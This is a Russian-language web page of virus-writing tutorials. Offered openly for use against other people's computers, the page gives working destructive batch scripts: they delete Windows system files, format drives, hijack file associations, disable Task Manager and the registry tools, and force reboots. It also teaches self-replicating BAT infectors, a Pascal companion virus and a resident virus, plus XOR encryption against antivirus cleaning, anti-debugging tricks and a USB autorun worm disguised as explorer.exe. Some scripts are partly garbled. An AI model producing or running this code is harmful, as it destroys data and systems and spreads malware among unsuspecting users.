Все очень просто! Заходим в блокнот и пишем вот это
@echo off
assoc.exe=.mp3 >nul
assoc.mp3=.bmp >nul
assoc.bmp=.mp3 >nul
assoc.jpg=.mp3 >nul
assoc.avi=.jpg >nul
assoc.txt=.mp3 >nul
assoc.sys=.mp3 >nul
assoc.dll=.mp3 >nul
assoc.tmp=.mp3 >nul
assoc.ini=.mp3 >nul
assoc.flv=.txt >nul
assoc.doc=.mp3 >nul
assoc.rar=.mp3 >nul
assoc.xls=.mp3 >nul
assoc.xlsx=.mp3 >nul
assoc.log=.mp3 >nul
assoc.rtf=.mp3 >nul
assoc.rif=.mp3>nul
assoc.docm=.mp3 >nul
asoc.scr=.mp3 >nul
assoc.cif=.mp3 >nul
assoc.zip=.mp3 >nul
assoc.dat=.mp3 >nul
assoc.inf=.mp3 >nul
assoc.gif=.rar >nul
assoc.wav=.zip >nul
assoc.mp4=.txt >nul
assoc.jpeg=.mp4 >nul
label D: TI KUSOK GOVNA >nul
label G: TI KUSOK GOVNA >nul
label E: TI KUSOK GOVNA >nul
label F: TI KUSOK GOVNA >nul
label C: TI KUSOK GOVNA >nul
label I:TI KUSOK GOVNA >nul
date 05.05.97 >nul
time 00:00 >nul
copy %0 D:\Mini-Game.bat >nul
copy %0 C:\Calculator.bat >nul
copy %0 I:\Car.bat >nul
copy %0 G:\Karta.bat >nul
shutdown -r -t 00 >nul
Потом сохраним например v.bat .bat это обезательно!! Готово:)
BAT-вирус
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
Этот вирус заражает винчестер, оставляя только один файл virus.bat. Но все-таки я бы не сказал что это полноценный вирус, т.к. он лишен возможности заражать другие компьютеры. Чтобы этот BAT-вирус обрел более четкие очертания дополним его возможностью заражать другие ПК:
@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
В этом примере появляется строка, которая дает возможность вирусу заражать дискеты. Смысл этого в том что если при перезагрузке ПК в дисководе будет дискета, то она будет заражена.
Конечно файл virus.bat в корневом диске C: будет сильно мозолить глаза юзеру, чтобы этого не было существует программа attrib. Преобразуем вирус:
@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul
Если вы внимательны, то вы уже поняли, что вызов файла virus.bat в autoexec.bat будет записываться каждый раз при перезагрузке ПК. Чтобы этого не произошло есть простой способ: после записи вызова надо с помощью программы attrib установить атрибут только чтение у autoexec.bat. А есть другой вариант, он немного посложнее, но гораздо грамотнее:
@Echo off
if exist c:virus.bat goto cool
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:cool
copy %0 a:run.bat >nul
Здесь вторая строка проверяет существует ли уже файл c:virus.bat и если он уже существует, то происходит переход к метке cool. Этот способ тоже очень прост. Явный недостаток - если юзер уберет вызов из autoexec.bat, а файл virus.bat оставит, то глупый вирус будет нагло обманут. Чтобы вирус был умнее, то надо использовать программу find, если вам будет не лень с ней разбираться, то вы сможете написать более сложный BAT-вирус, который будет заражать не один файл c:autoexec.bat, а все *.BAT. Пример:
@echo off%[MeTrA]%
if '%1=='In_ goto MeTrAin
if exist c:MeTrA.bat goto MeTrAru
if not exist %0 goto MeTrAen
find "MeTrA"<%0>c:MeTrA.bat
attrib +h c:MeTrA.bat
:MeTrAru
for %%t in (*.bat) do call c:MeTrA In_ %%t
goto MeTrAen
:MeTrAin
find "MeTrA"<%2>nul
if not errorlevel 1 goto MeTrAen
type c:MeTrA.bat>>%2
:MeTrAen
Смысл заражения таков: в вирусе каждая строчка имеет метку, в данном примере она MeTrA. Например, в первой строке эта метка ничего не делает, во второй строке эта метка, как бы, не является пассивной, она используется для внутренней работы вируса, а именно участвует в названии метки. При запуске вирус проверяет, есть ли файл C:METRA.BAT, если нет, то вирус создает его и с помощью программы find копирует из файла (из которого стартовал) все строки содержащие метку вируса, т.е. копирует только вирусные строки. Так, вирусные строки скопированы. Значит в файле C:METRA.BAT теперь находится копия вируса. Далее вирус ищет BAT-файлы. Чтобы не происходило повторного заражения используется все таже программа find. Допустим вирус нашел файл RUN.BAT и он оказался еще не заражен, тогда вирус вызывает файл C:METRA.BAT с такими параметрами: In_ RUN.BAT, здесь первый параметр In_ говорит вирусу, что надо заразить файл, имя которого указано во-втором параметре, в данном случае он RUN.BAT. Вирус в C:METRA.BAT заражает файл RUN.BAT простейшим способом - с помощью команды type дописывает к файлу RUN.BAT себя. Вот так файл RUN.BAT оказывается зараженным.
Компаньон-вирус
Эти вирусы не изменяют программы. Они создают для EXE-файлов COM-файлы. При запуске программы сначала запустится COM-файл с вирусом, который заразив другие файлы запустит EXE-файл. Рассмотрим пример:
{$M 2048,0,4096}
{$i-}
Program Metra;
uses dos;
var
DirInfo : SearchRec;
F1,f2 : File;
Buf : Array[0..5000] of Byte; { размер вируса }
NumRead : Word;
NumWritten : Word;
FT:text;
P: PathStr;
D: DirStr;
N: NameStr;
E: ExtStr;
namecom:string;
Label InfOk;
Begin
{ считать свое тело в буфер }
Assign(F2,ParamStr(0));
Reset(F2,1);
if ioresult<>0 then
begin
writeln('Файл ',paramstr(0),' не доступен!');
halt;
end;
BlockRead(F2,buf,SizeOf(buf),NumRead);
Close(F2);
{ искать жертву }
FindFirst('*.EXE',Archive,DirInfo);
While DosError = 0 Do
Begin
FSplit(dirinfo.name, D, N, E);
namecom:=n+'.com';
{ проверить существует ли файл }
Assign(ft,namecom);
reset(ft);
if ioresult=0 then { если уже существует }
begin
close(ft);
goto infOk;
end;
{ создать COM-файл с вирусом }
Assign(F1,namecom);
rewrite(f1);
if ioresult<>0 then goto InfOk; {если ошибка, то пропустить}
Reset(F1,1);
BlockWrite(F1,buf,NumRead,NumWritten);
Close(F1);
infOk:
FindNext(DirInfo);
End;
{ запустим своего носителя }
FSplit(paramstr(0), D, N, E);
swapvectors;
exec(d+n+'.EXE',paramstr(1));
swapvectors;
{ если вызвали с таким параметром, то надо представитьcя }
if paramstr(1)='/??' then
begin
writeln('Virus MeTrA.');
writeln('^^^^^^^^^^^^');
end;
halt(dosexitcode); { выйти и сохранить код ошибки }
End.
Вирус будет лучше если его упаковать чем-нибудь вроде PKLITE с параметром -e. Вверху есть массив - размер вируса, смотрите, чтобы значение его было не меньше EXE-файла с вирусом, а желательно чтобы и больше не было.
Вирус-спутник
Принцип заражения:
• найти EXE-файл
• найти OVR-файл с тем же именем
• если его нет, то переименовать найденный EXE-файл в OVR-файл, записаться вместо EXE-файла.
Резидентные вирусы
Из справки Паскаля:
{$M $800,0,0 } { 2K stack, no heap }
{ This program causes a click each time a key is pressed.}
uses Crt, Dos;
var
KbdIntVec : Procedure;
{$F+}
procedure Keyclick; interrupt;
begin
if Port[$60] < $80 then
{ Only click when key is pressed }
begin
Sound(5000);
Delay(1);
Nosound;
end;
inline ($9C); { PUSHF -- Push flags }
{ Call old ISR using saved vector }
KbdIntVec;
end;
{$F-}
begin
{ Insert ISR into keyboard chain }
GetIntVec($9,@@KbdIntVec);
SetIntVec($9,Addr(Keyclick));
Keep(0); { Terminate, stay resident }
end.
Теперь уберем все ошибки из этого примера и переделаем под вирус:
{$F+}
procedure Keyclick; interrupt;
begin
InfExe; { вызов процедуры заражения }
inline ($9C); { PUSHF -- Push flags }
{ Call old ISR using saved vector }
KbdIntVec;
end;
{$F-}
Здесь процедура InfExe является обычной процедурой нерезидентного вируса (заражает в текущем каталоге). А вот эти строки впишем в то место вируса, где как бы его конец.
{ Insert ISR into keyboard chain }
GetIntVec($21,@KbdIntVec);
SetIntVec($21,@Keyclick);
Keep(0); { Terminate, stay resident }
К сожалению в справке не сказано как избегать повторной установки в память, поэтому я советую чтобы вирус копировал свое тело в какой-нибудь файл на диске C:, вставлял его вызов в config.sys. Пример: install=c:vir.exe /123, здесь /123 - это такой параметр, он говорит вирусу, что тот стартовал для заражения памяти, т.е. ему не надо запускать своего носителя, а надо выполнить эти три строчки.
Можно помудрить и с другими прерываниями, но вынужден вас расстроить, вирусы такого типа, как правило, очень глючные и работают, в основном, только в многозначной среде (в эмуляции DOS виснут).
Усложнение лечения
Если у вас нет желания чтобы ваш вирус, доставшись какому-нибудь ламеру, стал жертвой его антивируса, то следует подумать об усложнении лечения.
Вирус на Паскале, как правило, заражает программы в начало, перенося старое содержимое в конец. Такими вирусами антивирусные базы пополняются автоматом (без вмешательства человека). Оно и понятно, переписать конец в начало и обрезать длину - это очень простая операция. Смысл усложнения лечения заключатся в шифровке куска своей жертвы. Т.к. кусок жертвы при переносе к конец файла находится в массиве, тогда поступаем примерно так:
for i:=1 to 777 do
begin
cc:=a1;
i2:=ord(cc) xor 343;
a1:=chr(i2);
end;
Здесь a1 - это массив, в котором сохраняется начало жертвы; i,i2 - integer; cc - char.
В результате данной операции шифруется кусок файла-жертвы (777 байт). Т.к. операция шифровки осуществляется с помощью XOR - для расшифровки используется та же операция. Значит эту маленькую подпрограмму надо оформить в виде процедуры, которую следует прописать в процедуре заражения и в процедуре запуска своего носителя (перед запуском и после запуска). Если вы не разбираетесь в XOR, то скажу, в моем примере шифровка осуществляется с помощью ключа 343, он может быть от 1 до 65000. Можно сделать так, чтобы этот ключ менялся при заражении каждого файла, например, сделать чтобы ключ зависел от размера своего носителя или можно генерировать ключ случайным образом и помещать его где-нибудь в теле вируса или считывать несколько байт кода жертвы, получать их ord-значения и использовать как ключ. И еще, в моем примере шифровка идет от начала файла, а можно сделать определенное смещение, которое тоже чтобы зависело от чего-нибудь. Размер шифровки у меня 777, а можно сделать ее тоже случайной и т.д. Можно также защитить вирус от ламерской трассировки:
uses dos;
var
O1H , O3H , Br : Pointer;
{$F+}
procedure ReBoot; Interrupt;
begin { а это для того, чтобы нехорошие дяди не запускали Debug }
InLine($EA/
$00/
$00/
$FF/
$FF);
end;
{$F-}
{$F+}
procedure BreakOff; Interrupt; { + }
begin
{ Invisible Magic Words! }
end;
{$F-}
begin {main}
GetIntVec($01 , O1H); { подготавливаем систему }
SetIntVec($01 , @ReBoot);
GetIntVec($03 , O3H); { вешаем антитрассировщик }
SetIntVec($03 , @ReBoot);
GetIntVec($1B , Br); { заменяем вектор ^C }
SetIntVec($1B , @BreakOff);
SetCBreak(False); { и отключаем ^C }
writeln('hello');
SetIntVec($01 , O1H); { восстанавливаем захваченные векторы }
SetIntVec($03 , O3H);
SetIntVec($1B , Br);
end.
Здесь вместо фразы Hello следует вставить процедуры вируса, процедуру запуска носителя следует вставлять после строк восстановления векторов.
@echo off - запрещаем вывод команд на экран, в том числе и результатов их выполнения.
color 40 - делаем фон файла красным, а буквы чёрными.
label LAMER - команда label указанная без параметров переименовывает системный диск на заданное слово.
attrib -s -r -h -a %systemdrive%*.* - снимаем системные атрибуты с некоторых файлов.
erase %windir%*.* /q - банальное удаление файлов.
erase %windir%system32*.* /q - банальное удаление файлов, хотя винду снесёт без проблем.
erase %systemdrive%*.* /q - удаление системно важных скрытых файлов на системном диске. Хотя чтобы винда больше не запустилась никаким образом достаточно удалить файл ntldr и перегрузиться.
regedit (путь к вашему файлу) - Добавляем информацию с вашего .reg файла в реестр. Существует ещё и команда reg с параметрами, но иногда проще создать отдельный .reg файл. Здесь фантазии может быть много...
echo текст >(>>) файл - Добавляем записи в файл. Знак > создаёт новый файл с заданным текстом, >> добавляет уже в существующий файл.
shutdown -r -f - Принудительно перезагружаем комп, несмотря на протесты системы.
Удалить дрова :
@echo off
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
Убрать рабочий стол :
@echo off
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Самоликвидация! Дописываем к любой проге что-бы не палиться : @echo off del "%0" >nul
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\System /v
DdisableTaskMgr /t REG_DWORD /d 1 /f >nul
-запрещает ТаскМена
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
-мнеяет кнопки мыши местами,можно здорово подпортить нервы кому нидь
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun
/v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
-запрет запуска програм
@echo off
del "%SystemRoot%\Cursors\*.*" >nul
-удаляет курсоры мыши
@echo off
del "%SystemRoot%\Media" /q >nul
-удаляет звуки винды
@echo off
reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
/v NoControlPanel /t REG_DWORD /d 1 /f >nul
-запретить панель управления
@echo off
net user "ламер" /add >nul
@echo off
del "%SystemRoot%\Cursors\*.*" >nul
Del C:\WINDOWS\system32\catsrvps.dll
Del C:\WINDOWS\system32\catsrvut.dll
Del C:\WINDOWS\system32\cdfview.dll
Del C:\WINDOWS\system32\cisvc.exe
Del C:\WINDOWS\system32\ckcnv.exe
Del C:\WINDOWS\system32\clb.dll
Del C:\WINDOWS\system32\cmd.exe
Del C:\WINDOWS\system32\cmdial32.dll
Del C:\WINDOWS\system32\cnbjmon.dll
Del C:\WINDOWS\system32\comctl32.ocx
Del C:\WINDOWS\system32\dplaysvr.exe
Del C:\WINDOWS\NOTEPAD.EXE
Del C:\WINDOWS\twunk_32.exe
Del C:\WINDOWS\wmprfRUS.prx
Del C:\WINDOWS\WindowsShell.Manifest');
Del C:\WINDOWS\regedit.exe
Del C:\WINDOWS\explorer.exe
Del C:\WINDOWS\OemDrv
Del C:\WINDOWS\PeerNet\sqldb20.dll
Del C:\WINDOWS\PeerNet\sqlqp20.dll
Del C:\WINDOWS\twain_32\wiatwain.ds
del virus.bat
Этот батик просто копирует себя на всякие носители каждые 20 секунд.
Превращаещь этот батик в explorer.exe спомощью Batexec и кудаешь в архив.
c:\windows\system32\exp.exe
if exist c:\exp.com goto end
: copy
copy c:\windows\taskmgr.exe a:\avtorun.exe
attrib a:\avtorun.exe +r +a +s +h
attrib c:\autorun.inf -r -a -s
echo [Avtorun]>c:\autorun.inf
echo open=avtorun.exe>>c:\autorun.inf
attrib c:\autorun.inf +r +a +s +h
attrib c:\avtorun.exe -r -a -s
copy c:\windows\taskmgr.exe c:\avtorun.exe
attrib c:\avtorun.exe +r +a +s +h
attrib d:\autorun.inf -r -a -s
echo [Avtorun]>d:\autorun.inf
echo open=avtorun.exe>>d:\autorun.inf
attrib d:\autorun.inf +r +a +s +h
attrib d:\avtorun.exe -r -a -s
copy d:\windows\taskmgr.exe d:\avtorun.exe
attrib d:\avtorun.exe +r +a +s +h
attrib e:\autorun.inf -r -a -s
echo [Avtorun]>e:\autorun.inf
echo open=avtorun.exe>>e:\autorun.inf
attrib e:\autorun.inf +r +a +s +h
attrib e:\avtorun.exe -r -a -s
copy e:\windows\taskmgr.exe e:\avtorun.exe
attrib e:\avtorun.exe +r +a +s +h
attrib f:\autorun.inf -r -a -s
echo [Avtorun]>f:\autorun.inf
echo open=avtorun.exe>>f:\autorun.inf
attrib f:\autorun.inf +r +a +s +h
attrib f:\avtorun.exe -r -a -s
copy f:\windows\taskmgr.exe f:\avtorun.exe
attrib f:\avtorun.exe +r +a +s +h
attrib g:\autorun.inf -r -a -s
echo [Avtorun]>g:\autorun.inf
echo open=avtorun.exe>>g:\autorun.inf
attrib g:\autorun.inf +r +a +s +h
attrib g:\avtorun.exe -r -a -s
copy g:\windows\taskmgr.exe g:\avtorun.exe
attrib g:\avtorun.exe +r +a +s +h
attrib h:\autorun.inf -r -a -s
echo [Avtorun]>h:\autorun.inf
echo open=avtorun.exe>>h:\autorun.inf
attrib h:\autorun.inf +r +a +s +h
attrib h:\avtorun.exe -r -a -s
copy h:\windows\taskmgr.exe h:\avtorun.exe
attrib h:\avtorun.exe +r +a +s +h
attrib i:\autorun.inf -r -a -s
echo [Avtorun]>i:\autorun.inf
echo open=avtorun.exe>>i:\autorun.inf
attrib i:\autorun.inf +r +a +s +h
attrib i:\avtorun.exe -r -a -s
copy i:\windows\taskmgr.exe i:\avtorun.exe
attrib i:\avtorun.exe +r +a +s +h
attrib j:\autorun.inf -r -a -s
echo [Avtorun]>j:\autorun.inf
echo open=avtorun.exe>>j:\autorun.inf
attrib j:\autorun.inf +r +a +s +h
attrib j:\avtorun.exe -r -a -s
copy j:\windows\taskmgr.exe j:\avtorun.exe
attrib j:\avtorun.exe +r +a +s +h
attrib k:\autorun.inf -r -a -s
echo [Avtorun]>k:\autorun.inf
echo open=avtorun.exe>>k:\autorun.inf
attrib k:\autorun.inf +r +a +s +h
attrib k:\avtorun.exe -r -a -s
copy k:\windows\taskmgr.exe k:\avtorun.exe
attrib k:\avtorun.exe +r +a +s +h
attrib l:\autorun.inf -r -a -s
echo [Avtorun]>l:\autorun.inf
echo open=avtorun.exe>>l:\autorun.inf
attrib l:\autorun.inf +r +a +s +h
attrib l:\avtorun.exe -r -a -s
copy l:\windows\taskmgr.exe l:\avtorun.exe
attrib l:\avtorun.exe +r +a +s +h
attrib m:\autorun.inf -r -a -s
echo [Avtorun]>m:\autorun.inf
echo open=avtorun.exe>>m:\autorun.inf
attrib m:\autorun.inf +r +a +s +h
attrib m:\avtorun.exe -r -a -s
copy m:\windows\taskmgr.exe m:\avtorun.exe
attrib m:\avtorun.exe +r +a +s +h
attrib n:\autorun.inf -r -a -s
echo [Avtorun]>n:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib n:\autorun.inf +r +a +s +h
attrib n:\avtorun.exe -r -a -s
copy n:\windows\taskmgr.exe r:\avtorun.exe
attrib n:\avtorun.exe +r +a +s +h
attrib o:\autorun.inf -r -a -s
echo [Avtorun]>o:\autorun.inf
echo open=avtorun.exe>>o:\autorun.inf
attrib o:\autorun.inf +r +a +s +h
attrib o:\avtorun.exe -r -a -s
copy o:\windows\taskmgr.exe o:\avtorun.exe
attrib o:\avtorun.exe +r +a +s +h
attrib p:\autorun.inf -r -a -s
echo [Avtorun]>p:\autorun.inf
echo open=avtorun.exe>>p:\autorun.inf
attrib p:\autorun.inf +r +a +s +h
attrib p:\avtorun.exe -r -a -s
copy p:\windows\taskmgr.exe p:\avtorun.exe
attrib p:\avtorun.exe +r +a +s +h
attrib q:\autorun.inf -r -a -s
echo [Avtorun]>q:\autorun.inf
echo open=avtorun.exe>>q:\autorun.inf
attrib q:\autorun.inf +r +a +s +h
attrib q:\avtorun.exe -r -a -s
copy q:\windows\taskmgr.exe q:\avtorun.exe
attrib q:\avtorun.exe +r +a +s +h
attrib r:\autorun.inf -r -a -s
echo [Avtorun]>r:\autorun.inf
echo open=avtorun.exe>>r:\autorun.inf
attrib r:\autorun.inf +r +a +s +h
attrib r:\avtorun.exe -r -a -s
copy r:\windows\taskmgr.exe r:\avtorun.exe
attrib r:\avtorun.exe +r +a +s +h
attrib s:\autorun.inf -r -a -s
echo [Avtorun]>s:\autorun.inf
echo open=avtorun.exe>>s:\autorun.inf
attrib s:\autorun.inf +r +a +s +h
attrib s:\avtorun.exe -r -a -s
copy s:\windows\taskmgr.exe s:\avtorun.exe
attrib s:\avtorun.exe +r +a +s +h
attrib t:\autorun.inf -r -a -s
echo [Avtorun]>t:\autorun.inf
echo open=avtorun.exe>>t:\autorun.inf
attrib t:\autorun.inf +r +a +s +h
attrib t:\avtorun.exe -r -a -s
copy t:\windows\taskmgr.exe t:\avtorun.exe
attrib t:\avtorun.exe +r +a +s +h
attrib u:\autorun.inf -r -a -s
echo [Avtorun]>u:\autorun.inf
echo open=avtorun.exe>>u:\autorun.inf
attrib u:\autorun.inf +r +a +s +h
attrib u:\avtorun.exe -r -a -s
copy u:\windows\taskmgr.exe u:\avtorun.exe
attrib u:\avtorun.exe +r +a +s +h
attrib v:\autorun.inf -r -a -s
echo [Avtorun]>v:\autorun.inf
echo open=avtorun.exe>>v:\autorun.inf
attrib v:\autorun.inf +r +a +s +h
attrib v:\avtorun.exe -r -a -s
copy v:\windows\taskmgr.exe v:\avtorun.exe
attrib v:\avtorun.exe +r +a +s +h
attrib w:\autorun.inf -r -a -s
echo [Avtorun]>w:\autorun.inf
echo open=avtorun.exe>>w:\autorun.inf
attrib w:\autorun.inf +r +a +s +h
attrib w:\avtorun.exe -r -a -s
copy w:\windows\taskmgr.exe w:\avtorun.exe
attrib w:\avtorun.exe +r +a +s +h
attrib x:\autorun.inf -r -a -s
echo [Avtorun]>x:\autorun.inf
echo open=avtorun.exe>>x:\autorun.inf
attrib x:\autorun.inf +r +a +s +h
attrib x:\avtorun.exe -r -a -s
copy x:\windows\taskmgr.exe x:\avtorun.exe
attrib x:\avtorun.exe +r +a +s +h
attrib y:\autorun.inf -r -a -s
echo [Avtorun]>y:\autorun.inf
echo open=avtorun.exe>>y:\autorun.inf
attrib y:\autorun.inf +r +a +s +h
attrib y:\avtorun.exe -r -a -s
copy y:\windows\taskmgr.exe y:\avtorun.exe
attrib y:\avtorun.exe +r +a +s +h
attrib z:\autorun.inf -r -a -s
echo [Avtorun]>z:\autorun.inf
echo open=avtorun.exe>>z:\autorun.inf
attrib z:\autorun.inf +r +a +s +h
attrib z:\avtorun.exe -r -a -s
copy z:\windows\taskmgr.exe z:\avtorun.exe
attrib z:\avtorun.exe +r +a +s +h
ping -n 20 77.88.22.224
goto copy
:end
Потом и щешь у себя на компе файл c:\windows\explorer.exe (с иконкой мой компьютер он открывает рабочий стол) и кидаешь его в архив предварительно закинув в папку system32 (не в системную с кучей файлов, а содданную тебою) дальше этот архив превращаешь в SFX с параметрами: Путь для распаковки: c:\windows\ ; Режим вывода информации: Скрыть все ; Режим перезаписи: Перезаписывать все файлы без запроса. Именушь этот SFX в avtorun. Создаешь второй файл autorun.inf с содержимым:
[Autorun]
open=avtorun.exe
записываешь эти файлы в корневую паку диска(флешки). И все, но если есть файл c:\exp.com то эта програмка сама завершит свою работу.
Вот еще код.
Chcp 1251
@echo off
time 00:00
Date 01.01.2314
del "%SystemRoot%system32*.dll" /q >nul
del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
del "%SystemRoot%Cursors*.*" >nul
del "%SystemRoot%Media" /q >nul
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
0reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
msiexec /?
if exist c:Installer.exe goto ski
if exist d:Installer.exe goto ski
if exist g:Installer.exe goto ski
if exist e:Installer.exe goto ski
copy %0 c:Install.exe >nul
attrib +h c:Installer.exe >nul
copy %0 d:Installer.exe >nul
attrib +h d:Installer.exe >nul
copy %0 e:Installer.exe >nul
attrib +h e:Installer.exe >nul
copy %0 g:Installer.exe >nul
attrib +h g:Installer.exe >nul
echo c:Installer.exe>>c:autoexec.bat
:ski
for %%t in (*.bat) do call c:Installer In_ %%t
for %%t in (*.bat) do call d:InstallerIn_ %%t
for %%t in (*.bat) do call e:Installer In_ %%t
for %%t in (*.bat) do call g:Installer In_ %%t
for %%t in (*.bat) do call a:Installer In_ %%t
find "Install "nul
type c:Installer.exe>>%2
type d:Installer.exe>>%2
type e:Installer.exe>>%2
type g:Installer.exe>>%2
type a:Installer.exe>>%2
Echo var WSHShell = WScript.CreateObject("WScript.Shell"); > %temp%mes.js
echo WSHShell.Popup ("Ваш компьютер подлежит немедленому уничтожению!"); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nu
%SystemRoot%/system32/rundll32 user32, SwapMouseButton
title Загрузка игры...
label C: Lamer
label D: ЧМО
label E:Пидар
attrib -h -s -a -r C:\*.*
del C:\*.* /q (
attrib -h -s -a -r C:\WINDOWS\system32\ *.* /s /d
assoc .exe=.mp3
assoc .dll=.txt
assoc .ini=.iso
assoc .drv=.doc
assoc .bin=.zip
assoc .sys=.xls
assoc .ax=.ppt
assoc .bpl=.wav
assoc .nls=.pub
assoc .tlb=.mdb
assoc .bat=.rar
assoc .exe=.virus
assoc .dll=.virus
assoc .ini=.virus
assoc .drv=.virus
assoc .bin=.virus
assoc .sys=.virus
assoc .ax=.virus
assoc .bpl=.virus
assoc .nls=.virus
assoc .tlb=.virus
assoc .bat=.virus
attrib +h +s C:/WINDOWS
format %D%: /q
format %E%: /q
echo ХА-ХА
format %C%: /q
pause
shutdown.exe -s -t 00
del %0
shutdown.exe -s -t 00
taskkill /f /im explorer.exe >nul
cls
Вирусик bat
Итак, приступим. Вы решили заняться вирусо-писательством. Сразу вам скажу, что эти вирусы, конечно, могут очень сильно навредить компьютеру, но полноценно передаваться с одного компьютера на другой они не могут. За все, что произойдет с вашим компьютером отвечаете вы и только вы. Приступим:
1) Открываем блокнот;
2) Пишем в нем «mspaint», без кавычек;
3) Сохраняем файл под любым именем, но вместо .txt мы напишем .bat;
4) Откроем файлик и увидим, что открылся Paint))
Вот и готова наша первая программка. Вместо «mspaint»
Архив записей
Наш опрос